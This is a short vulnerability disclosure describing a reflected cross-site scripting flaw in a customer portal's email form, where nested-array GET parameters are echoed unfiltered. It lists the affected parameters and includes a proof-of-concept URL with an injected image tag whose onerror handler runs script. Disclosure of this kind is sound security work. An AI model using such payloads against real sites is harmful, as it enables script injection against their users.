The affected resource is:
/customer/portal/emails/new
All GET parameters are affected by this vulnerability, for example:
email[body]
email[subject]
interaction[email]
interaction[name]
The application does not filter the parameters if they are passed as nested arrays and reflects its content in the response. Here is a PoC:
⁄customer⁄portal⁄emails⁄new?email[body]=&email[subject][]=asd'>
<img onerror="prompt(1)" src="x" ⁄>&interaction[email]=&interaction[name]=